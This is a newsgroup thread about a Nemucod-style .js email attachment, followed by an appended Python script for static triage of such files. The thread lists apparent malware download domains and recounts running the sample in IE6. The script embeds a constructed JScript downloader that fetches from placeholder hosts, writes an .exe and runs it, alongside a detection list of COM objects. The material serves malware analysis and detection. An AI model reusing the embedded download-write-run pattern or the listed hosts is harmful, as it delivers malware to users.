Ant wrote:
> > A unique name given to this malware seems to be "Nemucod"
>
> That's "documen"(t) backwards.
> It won't run with a single click. Malware like this relies on the
> willingness of users to go to any length to see what's inside. If
> they're stupid enough to ignore all sorts of warnings from their
> software or OS about opening attachments or running untrusted scripts
> or executables then they're good candidates for infection.
I got another such spam today, with another zip-compressed .js file:
https://www.virustotal.com/en/file/fa9c9f85ed1fea8b2fe19fcd43df7721fc16a333e42a9e8b4b5a918f86e5ca91/analysis/1441541590/
http://wepawet.iseclab.org/view.php?hash=1404be252a3d2861fdffc6af412d2495&type=js
Looks like it's trying to download an exe file from one of:
dickinsonwrestlingclub.com
www.fibrasinteticafm.com
laterrazzafiorita.it
I dragged the .js file over to a few of my installed browsers.
Firefox 2.0.0.20, Netscape 9.0.0.6 and Opera 12.02 all did the same
thing - just opened it as a text file and displayed the text of the .js
file.
IE 6 seems to have actually known it was a script file, because it first
threw up a warning if I wanted to open, run or save a potentially
dangerous file. I said sure - run it. It then threw up this error:
--------------
Windows Script Host
Script: (path to js file)\Invoice_whatever.doc.js
Line: 1
Char: 15876
Error: Arguments are of the wrong type, are out of acceptable range, or
are in conflict with one another.
Code: 800A0BB9
Source: ADODB.Stream
---------------
I had to dismiss that error message about 10 times before it went away.
I would have thought that Opera 12, being somewhat "new" or newer, would
have known how to handle or execute a .js file.
Is IE the only browser that opens / executes .js files if you drop the
file onto the browser? Is this unique to IE6, or do other versions of
IE also do this? Do newer versions of Mozilla-based browsers execute
.js files if you drop them on them?
I re-scanned the first .js file (the one I posted about here 4 days ago)
at VT. It is now being detected by 26 out of 57 AV programs. Here are
a few selected AV/AM programs among the 31 programs that ARE NOT
detecting this as malware - even 4 days after submission to VT:
Hall of Anti-Virus Shame (no demonstrated ability to detect .js threat
files in a timely manner to be of any use to an end user):
- Avast
- ClamAV
- MalwareBytes
- Microsoft
- Symantec
- TrendMicro/TrendMicro-Housecall
The .JS file today is currently being detected by 9 out of 57.
McAfee is labelling it as "BehavesLike.JS.ExploitBlacole" but a few
others are calling it JS/Nemucod.
Some selected programs that ARE detecting the previous .js file but NOT
the current submission:
Programs that will eventually (probably) detect this polymorphic .js
threat technique - but only after you've been exposed to it:
- AVG
- Avira
- ESET-NOD32
- F-Secure
- Kaspersky (!)
--- NewsGate v1.0 gamma 2
* Origin: News Gate @ Net396 -Huntsville, AL - USA (1:396/4)
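The post shows the only reliable way to learn what the attachment does was to let IE6 hand it to Windows Script Host, which got as far as ADODB.Stream before failing. An analyst does not need to run it: a downloader of this shape has to name the COM objects it uses (an XMLHTTP object to fetch, ADODB.Stream to write the .exe, WScript.Shell to run it) and the hosts it contacts, and those survive even when the names are split into string fragments to dodge signatures. The following static triage script is an added example and is not code from the original post or from any AV vendor; the sample it scans is a constructed look-alike with placeholder hostnames, not the real attachment, and the object list and verdict thresholds are the author's own assumptions.

```python
"""Static triage of a Windows Script Host (.js) e-mail attachment.

Added example, not code from the original post. SAMPLE_JS below is
CONSTRUCTED to resemble the download-write-run pattern the post
describes; it is not the real attachment and its hostnames are
placeholders (.test is a reserved TLD).
"""
import re
from urllib.parse import urlparse

# COM objects a WSH downloader of this kind has to instantiate (assumed list).
SUSPICIOUS_OBJECTS = {
    "MSXML2.XMLHTTP": "HTTP download",
    "Microsoft.XMLHTTP": "HTTP download",
    "ADODB.Stream": "binary file write",
    "WScript.Shell": "process execution",
    "Scripting.FileSystemObject": "file system access",
}

# Constructed sample. Object names are split and rejoined at runtime, which
# is enough to defeat a naive grep for "ADODB.Stream" on the raw file.
SAMPLE_JS = r'''
var a = ["MSXML2.", "XMLHTTP"]; var b = "ADODB" + ".Stream";
var h = ["http://example-one.test/get.php?id=1", "http://example-two.test/counter/?a=2"];
for (var i = 0; i < h.length; i++) {
  var x = new ActiveXObject(a.join(""));
  x.open("GET", h[i], false); x.send();
  if (x.status == 200) {
    var s = new ActiveXObject(b);
    s.Open(); s.Type = 1; s.Write(x.responseBody); s.Position = 0;
    s.SaveToFile("%TEMP%\\1.exe", 2); s.Close();
    new ActiveXObject("WScript.Shell").Run("%TEMP%\\1.exe");
    break;
  }
}
'''

# Double- or single-quoted JS string literal, backslash escapes allowed inside.
STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'')
URL_RE = re.compile(r'https?://[^\s"\'<>()]+', re.IGNORECASE)


def string_literals(js):
    """All string literals in source order, escapes left as written."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in STRING_LITERAL.finditer(js)]


def find_objects(js):
    """Map each suspicious COM object name present to what it is used for.

    Searches the raw source and the concatenation of every string literal,
    so "ADODB" + ".Stream" and ["MSXML2.", "XMLHTTP"].join("") still hit.
    Gluing all literals together deliberately over-approximates: a false
    positive costs an analyst a glance, a miss costs a workstation.
    """
    haystack = (js + "\n" + "".join(string_literals(js))).lower()
    return {name: why for name, why in SUSPICIOUS_OBJECTS.items()
            if name.lower() in haystack}


def find_hosts(js):
    """Unique hostnames of every http(s) URL in the script, first-seen order."""
    hosts = []
    for url in URL_RE.findall(js + "\n" + " ".join(string_literals(js))):
        host = urlparse(url).hostname
        if host and host not in hosts:
            hosts.append(host)
    return hosts


def triage(js):
    """Combine the indicators into a verdict without executing anything."""
    objects = find_objects(js)
    downloads = any(why == "HTTP download" for why in objects.values())
    writes = "ADODB.Stream" in objects
    runs = "WScript.Shell" in objects
    if downloads and writes and runs:
        verdict = "likely downloader"       # fetch + write to disk + execute
    elif objects:
        verdict = "suspicious"              # some WSH capability, incomplete chain
    else:
        verdict = "no WSH indicators"
    return {"verdict": verdict, "objects": objects, "hosts": find_hosts(js),
            "uses_activex": "ActiveXObject" in js}


if __name__ == "__main__":
    report = triage(SAMPLE_JS)
    print(report["verdict"])
    for name, why in report["objects"].items():
        print(f"  {name:28} {why}")
    for host in report["hosts"]:
        print(f"  contacts {host}")
```

Run it against a real attachment by reading the file into `triage()` instead of `SAMPLE_JS`; the hosts it lists are what you would block or look for in proxy logs, and the object list tells you, before any AV signature exists, whether the script can reach the download-write-run chain the post saw fail inside ADODB.Stream. Heavier obfuscation (character-code arithmetic, eval of decoded blobs) will get past this pass and needs a proper deobfuscator or a sandboxed WSH run.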